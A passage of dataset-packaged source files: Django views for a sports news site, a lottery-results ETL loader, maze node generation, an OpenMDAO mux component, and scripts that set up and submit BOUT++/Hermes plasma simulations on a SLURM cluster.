breadcrumbs.\n\n :param crumbs: a list of locations and names. Something like [('/team/1/', 'Barcelona'), ('/team/1/2/', 'Ronaldinho')]\n :returns: an html formated breadcrumbs\n :rtype: str\n \"\"\"\n ret = '/ → '\n number_of_elements = len(crumbs) - 1\n for i, element in enumerate(crumbs):\n (url, name) = element\n if i < number_of_elements:\n ret += '%s ' % (url, name)\n ret += '→ '\n else:\n ret += name\n return ret\n\n\ndef hero_of_the_day(day=datetime.date.today(), campionat=None):\n \"\"\"\n This function calculate the hero of the day. For each game we can calculate the hero by using the method game.hero().\n By default we think that we are interested in today.\n\n :param day: a day for calculating hero\n :type day: datetime.date\n :param campionat: the campionat for calculating hero. 
If it is None, we calculate for all leagues.\n :type campionat: writer.game.models.Campionat\n :returns: a dict with the player, the number of points and data about why we think it's a hero.\n :rtype: dict\n \"\"\"\n if day is None:\n day = datetime.date.today()\n args = Q(pub_date=day)\n if campionat:\n args &= Q(campionat=campionat)\n game_list = Game.objects.filter(args).all()\n hero = {'player': None, 'points': 0, 'data': None}\n ret = False\n for game in game_list:\n h = game.hero()\n if h and (h['points'] > hero['points']):\n hero = h\n ret = True\n if ret:\n return hero\n return None\n\n\ndef base(request, campionat=None):\n crumbs = ''\n news_args = Q(pub_date__lte=datetime.datetime.now())\n games_args = Q(ft=True)\n campionat_item = None\n if campionat:\n campionat_item = get_object_or_404(Campionat, slug=campionat)\n news_args &= Q(game__campionat=campionat_item)\n games_args &= Q(campionat=campionat_item)\n try:\n clasament_list = [campionat_item.clasament()]\n except:\n clasament_list = []\n live = request.GET.get('live', False)\n if live:\n news_args &= Q(game__live__isnull=False)\n last_game = Game.objects.filter(games_args).order_by('-pub_date').first()\n games_args &= Q(pub_date=last_game.pub_date)\n game_list = Game.objects.filter(games_args).order_by('-id')\n image_list = []\n for game in game_list:\n for image in game.images.all():\n image_list.append(image)\n news_list = News.objects.filter(news_args).order_by('-pub_date')\n paginator = Paginator(news_list, 10)\n\n page = request.GET.get('page', 1)\n newses = paginator.page(page)\n campionat_list = Campionat.objects.all()\n if not campionat:\n clasament_list = []\n for campionat in campionat_list:\n try:\n clasament_list.append(campionat.clasament())\n except:\n pass\n hero = hero_of_the_day(day=last_game.pub_date, campionat=campionat_item)\n if campionat_item:\n crumbs = create_breadcrumbs([\n (None, campionat_item.title)\n ])\n return render(request, 'index.html',\n {'news_list': newses, 'campionat_list': campionat_list,\n 'game_list': game_list, 'image_list': image_list,\n 'clasament_list': clasament_list, 'hero': hero,\n 'campionat_item': campionat_item, 'crumbs': crumbs})\n\n\ndef news(request, campionat=None, title=None):\n news_item = News.objects.filter(\n game__campionat__slug=campionat,\n slug=title\n ).first()\n if not news_item:\n raise Http404\n campionat_list = Campionat.objects.all()\n clasament_list = []\n try:\n clasament_list = [news_item.game.render_clasament()]\n if news_item.game != news_item.game.campionat.game_set.first():\n clasament_list.append(news_item.game.campionat.clasament())\n except:\n pass\n hero = news_item.game.hero()\n crumbs = create_breadcrumbs([\n (reverse('campionat',\n kwargs={'campionat': news_item.game.campionat.slug}\n ), news_item.game.campionat.title),\n (None, news_item.title)\n ])\n other_news_list = News.objects.filter(\n Q(game__campionat=news_item.game.campionat) &\n Q(game__pub_date=news_item.game.pub_date) &\n Q(pub_date__lt=news_item.pub_date)\n ).order_by('-id')\n return render(request, 'news.html',\n {'news_item': news_item, 'campionat_list': campionat_list,\n 'clasament_list': clasament_list, 'hero': hero,\n 'crumbs': crumbs, 'other_news_list': other_news_list})\n\n\ndef teams(request, campionat=None):\n campionat = get_object_or_404(Campionat, slug=campionat)\n team_list = campionat.team_set.all()\n clasament_list = []\n try:\n clasament_list = [campionat.clasament()]\n except:\n pass\n campionat_list = Campionat.objects.all()\n return render(request, 'teams.html', {'team_list': team_list,\n 'clasament_list': 
clasament_list,\n 'campionat_list': campionat_list})\n\n\ndef team(request, campionat=None, team=None):\n team = Team.objects.filter(\n Q(slug=team) & Q(campionat__slug=campionat)\n ).first()\n if not team:\n raise Http404\n clasament_list = [team.campionat.clasament()]\n player_list = list(set(list(Player.objects.filter(\n Q(goal__team=team) & Q(goal__auto=False)).all())))\n game_list = Game.objects.filter(\n Q(ft=True) &\n (Q(team1=team) | Q(team2=team))\n ).order_by('-pub_date')\n crumbs = create_breadcrumbs([\n (reverse('campionat',\n kwargs={'campionat': team.campionat.slug}\n ), team.campionat.title\n ),\n (None, team.title)\n ])\n return render(request, 'team.html', {'team': team,\n 'clasament_list': clasament_list,\n 'player_list': player_list,\n 'game_list': game_list,\n 'crumbs': crumbs})\n\n\ndef rss(request, campionat=None, team=None):\n args = Q(pub_date__lte=datetime.datetime.now())\n if campionat:\n args &= Q(game__campionat__slug=campionat)\n if team:\n args &= (Q(game__team1__slug=team) | Q(game__team2__slug=team))\n article_list = News.objects.filter(args).order_by('-pub_date')[0:50]\n template = get_template('rss.xml')\n return HttpResponse(template.render(Context(locals())),\n content_type=\"application/rss+xml\")\n","repo_name":"gnunixon/sport-news-writer","sub_path":"writer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25931915650","text":"import csv\nimport os\nfrom io import StringIO\n\nimport boto3\nimport requests\nfrom boto3.dynamodb.conditions import Key\n\nURL_TEMPLATE = 'https://www.txlottery.org/export/sites/lottery/Games/{}/Winning_Numbers/{}.csv'\nLOTTERY_RESULTS_TABLE = os.environ['TABLE_NAME']\n\n\nclass Games:\n LOTTO_TEXAS = 'Lotto Texas'\n MEGAMILLIONS = 'Mega Millions'\n POWERBALL = 'Powerball'\n\n\ndef run_etl(game_id: str) -> dict:\n source_data = extract_winning_numbers(game_id)\n loaded = load_winning_numbers(source_data)\n return {\n game_id: {\n 'extracted': len(source_data),\n 'loaded': loaded\n }\n }\n\n\ndef extract_winning_numbers(game_id: str) -> list:\n url = URL_TEMPLATE.format(\n game_id.replace(' ', '_'),\n game_id.replace(' ', '').lower()\n )\n resp = requests.get(url)\n reader = csv.DictReader(StringIO(resp.text),\n fieldnames=['GameName', 'Month', 'Day', 'Year'],\n restkey='Numbers')\n winning_numbers = []\n for row in reader:\n winning_numbers.append({\n 'DrawingDate': '{}-{:02d}-{:02d}'.format(int(row['Year']), int(row['Month']), int(row['Day'])),\n 'GameId': row['GameName'].replace(' ', '').lower(),\n 'WinningNumbers': [int(n) for n in row['Numbers']]\n })\n\n return winning_numbers\n\n\ndef load_winning_numbers(winning_numbers: list):\n game_id = str(winning_numbers[0]['GameId'])\n table = boto3.resource('dynamodb').Table(LOTTERY_RESULTS_TABLE)\n\n # Get latest loaded record from target table.\n resp = table.query(\n KeyConditionExpression=Key('GameId').eq(game_id),\n ScanIndexForward=False,\n Limit=1)\n results_to_load = []\n if len(resp['Items']) == 0:\n # No data has been loaded, so load everything.\n results_to_load = winning_numbers\n else:\n latest_loaded_date = resp['Items'][0]['DrawingDate']\n for result in reversed(winning_numbers):\n result_date = result['DrawingDate']\n if result_date <= latest_loaded_date:\n break\n results_to_load.append(result)\n\n # Load only records after latest loaded date.\n with table.batch_writer() as batch:\n for result in results_to_load:\n 
batch.put_item(Item=result)\n\n return len(results_to_load)\n","repo_name":"puremcc/lottochecker","sub_path":"backend/functions/etl/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29577984694","text":"def genNode(grid, size, nodes, pop_no):\n for i in range(size):\n for j in range(size):\n if ((grid[j][i].walls[1] == False and grid[j][i].walls[0] == False) and\n (grid[j][i].walls[2] == True and grid[j][i].walls[3] == True)) or \\\n ((grid[j][i].walls[1] == True and grid[j][i].walls[0] == True) and\n (grid[j][i].walls[2] == False and grid[j][i].walls[3] == False)):\n grid[j][i].isNode = False\n else:\n nodes.append(grid[j][i])\n grid[j][i].beenVisited = [(False, None) for x in range(pop_no)]\n grid[j][i].check_out = [{\"up\": False, \"down\": False, \"left\": False, \"right\": False} for x in range(pop_no)]\n\n\n\ndef genNeighbor(grid, size):\n # up 0, down 1, right 2, left 3\n for i in range(size):\n for j in range(size):\n if grid[j][i].isNode:\n if grid[j][i].walls[0] == False:\n k = j - 1\n while not grid[k][i].isNode:\n k -= 1\n grid[j][i].neighbors[\"up\"] = grid[k][i]\n\n if grid[j][i].walls[1] == False:\n k = j + 1\n while not grid[k][i].isNode:\n k += 1\n grid[j][i].neighbors[\"down\"] = grid[k][i]\n\n # if right is false, find nearest neighbor\n if grid[j][i].walls[2] == False:\n k = i + 1\n while not grid[j][k].isNode:\n k += 1\n grid[j][i].neighbors[\"right\"] = grid[j][k]\n\n if grid[j][i].walls[3] == False:\n k = i - 1\n while not grid[j][k].isNode:\n k -= 1\n grid[j][i].neighbors[\"left\"] = grid[j][k]\n\n\ndef print_Neighbors(grid, direction):\n for row in grid:\n for e in row:\n if direction == 0:\n if e.neighbors[\"up\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Top neighbor is:\", end=\" \")\n e.neighbors[\"up\"].print_node()\n if direction == 1:\n if e.neighbors[\"down\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Bottom neighbor is:\", end=\" \")\n e.neighbors[\"down\"].print_node()\n if direction == 2:\n if e.neighbors[\"right\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Right neighbor is:\", end =\" \")\n e.neighbors[\"right\"].print_node()\n if direction == 3:\n if e.neighbors[\"left\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Left neighbor is:\", end=\" \")\n e.neighbors[\"left\"].print_node()\n\n\n","repo_name":"Levoo/CPSC481-AI_Proj","sub_path":"NodeGen.py","file_name":"NodeGen.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37339374528","text":"import pdb\nimport numpy as np\nimport openmdao\nimport openmdao.api as om\n\n\nclass Mux(om.ExplicitComponent):\n \"\"\"\n Mux trajectory phases.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Instantiate Mux and populate private members.\n \"\"\"\n super().__init__(**kwargs)\n\n self._vars = {}\n self._input_names = {}\n\n def initialize(self):\n \"\"\"\n Declare options.\n \"\"\"\n\n # self.options.declare('gauss_transcription_order', default=3, desc='transcription_order')\n self.options.declare('input_size_array', default=np.array([20, 20]), desc='Size of input arrays to be muxed')\n self.options.declare('output_size', default=2, desc='Size of the muxed array')\n self.options.declare('objective', types=str)\n self.options.declare('case_name', types=str)\n self.options.declare('output_directory_name', types=str)\n\n def 
add_var(self, name:str, val=1.0, units=None, desc=''):\n \"\"\"\n Add variable to the mux component.\n\n :param name: variable name\n :type name: str\n :param val: variable value\n :type val: np.ndarray\n :param units: variable units\n :type units: str\n :param desc: variable description\n :type desc: str\n\n :return: None\n \"\"\"\n\n # Load options\n input_size_array = self.options['input_size_array']\n output_size = self.options['output_size']\n mux_num = len(input_size_array)\n\n self._vars[name] = {'val': val, 'units': units, 'desc': desc}\n options = self._vars[name]\n kwgs = self._vars[name]\n\n # Add inputs for the number of arrays to be muxed for the variable name\n self._input_names[name] = []\n \n n_output = 0\n for i in range(mux_num):\n # Add input names to options dict\n in_name = '{0}_{1}'.format(name, i)\n self._input_names[name].append(in_name)\n \n # Add inputs to component\n self.add_input(name=in_name, shape=(input_size_array[i],), **kwgs)\n\n # Add partials\n if i < mux_num-1:\n ro = np.arange(n_output, n_output + input_size_array[i]-1)\n else:\n ro = np.arange(n_output, n_output + input_size_array[i])\n\n # Delete duplicates\n # cols = np.arange(shapes[i])\n if i < mux_num-1:\n co = np.arange(input_size_array[i]-1)\n else:\n co = np.arange(input_size_array[i])\n\n # Declare partials\n self.declare_partials(of=name, wrt=in_name, rows=ro, cols=co)\n\n # Add to output size\n if i < mux_num - 1:\n n_output = n_output + (input_size_array[i] - 1)\n else:\n n_output = n_output + input_size_array[i]\n\n # Add output variable\n self.add_output(name=name,\n val=np.zeros(int(output_size),),\n units=options['units'],\n desc=options['desc'])\n\n def compute(self, inputs: openmdao.vectors.default_vector.DefaultVector, outputs: openmdao.vectors.default_vector.DefaultVector):\n\n # Load options\n input_size_array = self.options['input_size_array']\n mux_num = len(input_size_array)\n\n # Iterate over the variables in the mux component\n for var in self._vars:\n\n # Select input variable name \n invar = self._input_names[var]\n\n # Append inputs of same variable name to vals\n output_vals=[]\n for i in range(mux_num): \n # Extract input array\n input_array = inputs[invar[i]]\n\n if i < mux_num-1:\n output_vals.append(input_array[np.arange(input_size_array[i]-1)])\n else:\n output_vals.append(input_array[np.arange(input_size_array[i])])\n\n # Write stack of vals to outputs\n outputs[var] = np.hstack(output_vals)\n\n if var in ['TS', 'theta_flaps', 'alpha']:\n if self.options['objective'] == 'noise':\n # Write TS to file\n f = open('/Users/laurensvoet/Documents/Research/pyNA/pyNA/cases/' + self.options['case_name'] + '/output/' + self.options['output_directory_name'] + '/' + 'inputs_' + var + '.txt' , 'a')\n f.write(str(outputs[var]) + '\\n')\n f.close()\n\n def compute_partials(self, inputs:openmdao.vectors.default_vector.DefaultVector, partials: openmdao.vectors.default_vector.DefaultVector):\n\n # Load options\n input_size_array = self.options['input_size_array']\n mux_num = len(input_size_array)\n\n for var in self._vars:\n invar = self._input_names[var]\n\n for i, iv in enumerate(invar):\n\n if i < mux_num-1:\n partials[var, iv]= np.ones(input_size_array[i]-1)\n else:\n partials[var, iv]= np.ones(input_size_array[i])\n\n \n\n\n","repo_name":"MIT-LAE/pyNA","sub_path":"pyNA/src/trajectory_src/mux.py","file_name":"mux.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} 
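The compute() method above implements the phase-joining rule for the muxed trajectory: every phase except the last contributes all but its final point, so the state value shared by two consecutive phases appears only once in the output. A minimal standalone sketch of that rule (plain NumPy; the phase arrays here are invented for illustration and are not part of pyNA):

import numpy as np

# Two phase arrays that share their boundary point.
phase_0 = np.array([0.0, 1.0, 2.0])   # ends where the next phase starts
phase_1 = np.array([2.0, 3.0, 4.0])

# Drop the last point of every phase except the final one, then stack,
# so the shared boundary value is not duplicated in the muxed array.
muxed = np.hstack([phase_0[:-1], phase_1])
assert np.array_equal(muxed, np.array([0.0, 1.0, 2.0, 3.0, 4.0]))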
+{"seq_id":"15931491038","text":"import numpy as np\nimport os\nimport sys\nimport datetime\nimport time\nfrom boutdata.restart import addvar\nfrom boutdata.restart import create\nfrom boutdata.restart import addnoise\nfrom boutdata.restart import resizeZ\nfrom boutdata.restart import redistribute\nfrom inspect import getsource as GS\n\n\ndef func_reqs(obj):\n lines = GS(obj).partition(':')[0]\n print(lines)\n\n\ndef list_files(path):\n files = [f for f in os.listdir(path) if os.path.isfile(f)]\n for f in files:\n print(f)\n\n\ndef replace_line(file_name, line_num, text):\n # replaces lines in a file\n lines = open(file_name, 'r').readlines()\n lines[line_num - 1] = text + '\\n'\n out = open(file_name, 'w')\n out.writelines(lines)\n out.close()\n\n\ndef find_line(filename, lookup):\n # finds line in a file\n line_num = 'blah'\n with open(filename) as myFile:\n for num, line in enumerate(myFile, 1):\n if lookup in line:\n line_num = num\n if line_num == 'blah':\n sys.exit('could not find \"{}\" in \"{}\"'.format(lookup, filename))\n return line_num\n\n\ndef read_line(filename, lookup):\n lines = open(filename, 'r').readlines()\n line_num = find_line(filename, lookup) - 1\n tmp = lines[line_num].split(': ')[1]\n try:\n tmp = eval(tmp)\n except(NameError, SyntaxError):\n tmp = tmp.strip()\n return tmp\n\n\ndef list_grids(densities, shotnum, machine='tcv', resolution='64x64'):\n d_names = []\n for d in densities:\n d_names.append(f'{machine}_{shotnum}_{resolution}_profiles_{d}e19.nc')\n return d_names\n\n\nclass logSim:\n '''\n For logging simulation parameters\n '''\n def __init__(self, location, filename):\n self.fileName = '{}/{}'.format(location, filename)\n self.logFile = open(self.fileName, 'w+')\n self.logFile.close()\n\n def __call__(self, message):\n self.logFile = open(self.fileName, 'a+')\n self.logFile.write('{}\\r\\n'.format(message))\n self.logFile.close()\n\n\nclass startSim:\n '''\n Create a simulation object, defined with path to pertinent files and\n where they should be copied to. 
Also defines methods for modifying\n BOUT.inp file and job submission scripts\n '''\n def __init__(self, pathOut, pathIn, dateDir, inpFile='BOUT.inp',\n gridFile=None, scanParams=None, title='sim'):\n os.chdir(pathOut)\n self.pathOut = pathOut\n self.pathIn = pathIn\n self.inpFile = inpFile\n self.gridFile = gridFile\n self.runDir = '{}/{}/{}-{}'.format(pathOut, pathIn, title, dateDir)\n self.scanParams = scanParams\n self.title = title\n if self.scanParams is not None:\n self.scanNum = len(scanParams)\n else:\n self.scanNum = 1\n if os.path.isdir('{}/{}'.format(pathOut, pathIn)) is not True:\n os.chdir(pathOut)\n os.mkdir(pathIn)\n\n def modInp1(self, param, lineNum=None):\n if lineNum is None:\n lineNum = find_line('{}/0/{}'.format(\n self.runDir, self.inpFile),\n param)\n else:\n lineNum = lineNum\n for i, j in enumerate(self.scanParams):\n os.chdir('{}/{}'.format(self.runDir, i))\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, j))\n\n def modInp2(self, param, value, lineNum=None):\n self.log('Modified {} to: {}'.format(param, value))\n if lineNum is None:\n lineNum = find_line('{}/0/{}'.format(\n self.runDir, self.inpFile),\n param)\n else:\n lineNum = lineNum\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, value))\n\n def modJob(self, nProcs, hermesVer, tme, optNodes=True):\n self.log('nProcs: {}'.format(nProcs))\n self.log('hermesVer: {}'.format(hermesVer))\n self.log('simTime: {}'.format(tme))\n if optNodes is True:\n nodes = int(np.ceil(nProcs/40))\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--nodes'),\n '#SBATCH --nodes={}'.format(nodes))\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n # os.system('cp {}/test.job {}.job'.format(\n # self.pathOut, self.title))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--ntasks'),\n '#SBATCH --ntasks={}'.format(nProcs))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n 'mpiexec'),\n 'mpiexec -n {} {} -d {}/{}'.format(nProcs,\n hermesVer,\n self.runDir,\n i))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--job-name'),\n '#SBATCH --job-name={}-{}'.format(self.title, i))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--time'),\n '#SBATCH --time={}'.format(tme))\n\n def setup(self):\n os.mkdir('{}'.format(self.runDir))\n os.chdir('{}'.format(self.runDir))\n self.log = logSim(self.runDir, 'log.txt')\n self.log('title: {}'.format(self.title))\n self.log('inpFile: {}'.format(self.inpFile))\n self.log('gridFile: {}'.format(str(self.gridFile)))\n self.log('scanParams: {}'.format(str(self.scanParams)))\n for i in range(self.scanNum):\n os.mkdir(str(i))\n os.system('cp {}/{} {}/BOUT.inp'.format(self.pathOut,\n self.inpFile, i))\n os.system('cp {}/{} {}/{}.job'.format(\n self.pathOut, 'test.job', i, self.title))\n if type(self.gridFile) == str:\n os.system('cp /users/hm1234/scratch/gridfiles/{} {}'.format(\n self.gridFile, i))\n self.inpFile = 'BOUT.inp'\n if self.gridFile is not None:\n self.modInp2('grid', self.gridFile)\n\n def subJob(self, shortQ=False):\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n if shortQ is False:\n os.system('sbatch {}.job'.format(self.title))\n elif shortQ is 
True:\n os.system('sbatch -q short {}.job'.format(self.title))\n\n\nclass slabSim(startSim):\n pass\n # def __init__(self, pathOut, pathIn, dateDir, inpFile,\n # gridFile=None, scanParams=None, title='sim'):\n # super().__init__(pathOut, pathIn, dateDir, inpFile, None,\n # scanParams=None, title='sim')\n\n # def setup(self):\n # os.mkdir('{}'.format(self.runDir))\n # os.chdir('{}'.format(self.runDir))\n # self.log = logSim(self.runDir, 'log.txt')\n # self.log('title: {}'.format(self.title))\n # self.log('inpFile: {}'.format(self.inpFile))\n # self.log('gridFile: {}'.format(str(self.gridFile)))\n # self.log('scanParams: {}'.format(str(self.scanParams)))\n # for i in range(self.scanNum):\n # os.mkdir(str(i))\n # os.system('cp {}/{} {}/BOUT.inp'.format(self.pathOut,\n # self.inpFile, i))\n # self.inpFile = 'BOUT.inp'\n\n\nclass multiGridSim(startSim):\n def __init__(self, pathOut, pathIn, dateDir, inpFile,\n scanParams, title='sim'):\n super().__init__(pathOut, pathIn, dateDir, inpFile, 'blah',\n scanParams, title)\n self.gridFile = self.scanParams\n\n def setup(self):\n super().setup()\n for i in range(self.scanNum):\n # copy the grid file for this scan point into its run directory\n os.system('cp /users/hm1234/scratch/gridfiles/{} {}/{}'.format(\n self.scanParams[i], self.runDir, i))\n self.modInp1('grid')\n\n\nclass addSim:\n def __init__(self, runDir, scanIDs=[], logFile='log.txt'):\n self.runDir = runDir\n os.chdir(runDir)\n self.scanParams = read_line(logFile, 'scanParams')\n if len(scanIDs) == 0:\n if self.scanParams is not None:\n self.scanIDs = list(np.arange(len(self.scanParams)))\n else:\n self.scanIDs = [0]\n else:\n self.scanIDs = scanIDs\n if self.scanParams is not None:\n self.scanNum = len(self.scanParams)\n else:\n self.scanNum = 1\n self.title = read_line(logFile, 'title')\n # self.inpFile = read_line(logFile, 'inpFile')\n self.inpFile = 'BOUT.inp'\n self.gridFile = read_line(logFile, 'gridFile')\n self.hermesVer = read_line(logFile, 'hermesVer')\n self.nProcs = read_line(logFile, 'nProcs')\n\n def copyNewInp(self, oldDir, inpName):\n for i in self.scanIDs:\n os.system('cp {}/{} {}/{}/{}/BOUT.inp'.format(\n oldDir, inpName, self.runDir, i, self.addType))\n\n def modInp(self, param, lineNum=None):\n scanParams = []\n for i in self.scanIDs:\n scanParams.append(self.scanParams[i])\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n if lineNum is None:\n lineNum = find_line('{}/{}/{}/{}'.format(\n self.runDir, i, self.addType, self.inpFile),\n param)\n else:\n lineNum = lineNum\n for j in scanParams:\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, j))\n\n def copyInpFiles(self, oldDir=None, addType='restart'):\n self.addType = addType\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n os.system('mkdir -p {}'.format(addType))\n # print(os.system('pwd'))\n # os.system('cp {}/{}/{}/BOUT.inp {}'.format(self.runDir, i,\n # oldDir, addType))\n if type(self.gridFile) == list:\n os.system('cp {} {}'.format(self.gridFile[i], addType))\n elif self.gridFile is None:\n pass\n else:\n os.system('cp {} {}'.format(self.gridFile, addType))\n os.system('cp *.job {}/{}.job'.format(addType, addType))\n if oldDir is None:\n cmd = 'cp {} {}'.format(self.inpFile, addType)\n else:\n cmd = 'cp {}/{} {}'.format(oldDir, self.inpFile, addType)\n os.system(cmd)\n\n def copyRestartFiles(self, oldDir=None, addType='restart', t=None):\n if t is None:\n if oldDir is None:\n cmd = 'cp BOUT.restart.* {}'.format(addType)\n else:\n cmd = 'cp {}/BOUT.restart.* {}'.format(oldDir, 
addType)\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n os.system(cmd)\n else:\n for i in self.scanIDs:\n if oldDir is None:\n os.chdir('{}/{}'.format(self.runDir, i))\n else:\n os.chdir('{}/{}/{}'.format(\n self.runDir, i, oldDir))\n create(final=t, path=\"./\", output='{}/{}/{}'.format(\n self.runDir, i, addType))\n\n def redistributeProcs(self, oldDir, addType, npes):\n self.copyInpFiles(oldDir, addType)\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n redistribute(npes=npes, path=oldDir, output=addType)\n self.nProcs = npes\n\n def modFile(self, param, value, lineNum=None):\n for i in self.scanIDs:\n if lineNum is None:\n lineNum = find_line('{}/{}/{}/{}'.format(\n self.runDir, i, self.addType, self.inpFile),\n param)\n else:\n lineNum = lineNum\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, value))\n\n def modJob(self, tme, nProcs=None, optNodes=True):\n if nProcs is None:\n nProcs = self.nProcs\n if optNodes is True:\n nodes = int(np.ceil(nProcs/40))\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--nodes'),\n '#SBATCH --nodes={}'.format(nodes))\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--ntasks'),\n '#SBATCH --ntasks={}'.format(nProcs))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n 'mpiexec'),\n 'mpiexec -n {} {} -d {}/{}/{} restart'.format(\n nProcs, self.hermesVer, self.runDir,\n i, self.addType))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--job-name'),\n '#SBATCH --job-name={}-{}'.format(self.addType, i))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--time'),\n '#SBATCH --time={}'.format(tme))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--mem'),\n '#SBATCH --mem={}'.format('8gb'))\n\n def subJob(self, shortQ=False):\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n if shortQ is False:\n os.system('sbatch {}.job'.format(self.addType))\n elif shortQ is True:\n os.system('sbatch -q short {}.job'.format(self.addType))\n\n\nclass addNeutrals(addSim):\n def addVar(self, Nn=0.1, Pn=0.05):\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n addvar('Nn', Nn)\n addvar('Pn', Pn)\n\n\nclass addCurrents(addSim):\n pass\n\n\nclass restartSim(addSim):\n pass\n\n\nclass addTurbulence(addSim):\n '''\n make sure to use\n export\n PYTHONPATH=/mnt/lustre/groups/phys-bout-2019/BOUT-dev/tools/pylib/:$PYTHONPATH\n '''\n def addTurb(self, oldDir, addType, npes=None, MZ=64,\n param='Vort', pScale=1e-5, multiply=True):\n if npes is not None:\n tempDir = 'temp-turb'\n self.redistributeProcs(npes=npes, oldDir=oldDir, addType=tempDir)\n oldDir = tempDir\n self.copyInpFiles(oldDir, addType)\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n resizeZ(newNz=MZ, path=oldDir, output=addType)\n addnoise(path=addType, var=param, scale=pScale)\n self.modFile('nz', MZ)\n if npes is not None:\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n os.system('rm -rf {}'.format(tempDir))\n\n\nif __name__ == \"__main__\":\n inpFile = 
'BOUT.inp'\n gridFile = 'tcv_52068_64x64_profiles_1e19.nc'\n gridFile = 'tcv_63127_64x64_profiles_1.2e19.nc'\n\n pathOut = '/users/hm1234/scratch/newTCV2'\n pathIn = 'gridscan2'\n pathIn = 'gridscan'\n pathIn = 'init'\n pathIn = 'gridscan3'\n pathIn = 'hdscan'\n # pathIn = 'high_recycle'\n # pathIn = 'high_density'\n dateDir = datetime.datetime.now().strftime(\"%d-%m-%y_%H%M%S\")\n # dateDir = '_turbTest'\n\n # title = 'cfrac'\n # scanParams = [0.01, 0.02, 0.03, 0.05, 0.07]\n\n title = 'rfrac'\n scanParams = [0.9, 0.93, 0.96, 0.99]\n # scanParams = [0.95]\n\n nProcs = 234\n tme = '00:19:19' # day-hr:min:sec\n # tme = '10:10:00'\n # hermesVer = '/users/hm1234/scratch/BOUT-test4/hermes-2/hermes-2'\n # hermesVer = '/mnt/lustre/groups/phys-bout-2019/hermes-2-next/hermes-2'\n # hermesVer = '/users/hm1234/scratch/BOUT25Jun19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT5Jul19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT18Sep19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT28Oct19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT21Nov19/hermes-2v2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT21Nov19/test/hermes-2/hermes-2'\n\n title = 'grid'\n\n grids = ['tcv_63127_256x64_profiles_2e19.nc',\n 'tcv_63127_256x64_profiles_4e19.nc',\n 'tcv_63127_256x64_profiles_6e19.nc',\n 'tcv_63127_256x64_profiles_8e19.nc']\n # 'tcv_63127_256x64_profiles_10e19.nc']\n # grids = ['tcv_63161_64x64_profiles_1e19.nc',\n # 'tcv_63161_64x64_profiles_2e19.nc',\n # 'tcv_63161_64x64_profiles_3e19.nc',\n # 'tcv_63161_64x64_profiles_3.25e19.nc',\n # 'tcv_63161_64x64_profiles_3.5e19.nc',\n # 'tcv_63161_64x64_profiles_3.75e19.nc',\n # 'tcv_63161_64x64_profiles_4.5e19.nc',\n # 'tcv_63161_64x64_profiles_5.5e19.nc']\n # grids = ['tcv_63161_64x64_profiles_6e19.nc',\n # 'tcv_63161_64x64_profiles_6.5e19.nc',\n # 'tcv_63161_64x64_profiles_7e19.nc',\n # 'tcv_63161_64x64_profiles_7.5e19.nc',\n # 'tcv_63161_64x64_profiles_8.2e19.nc']\n # gridFile = 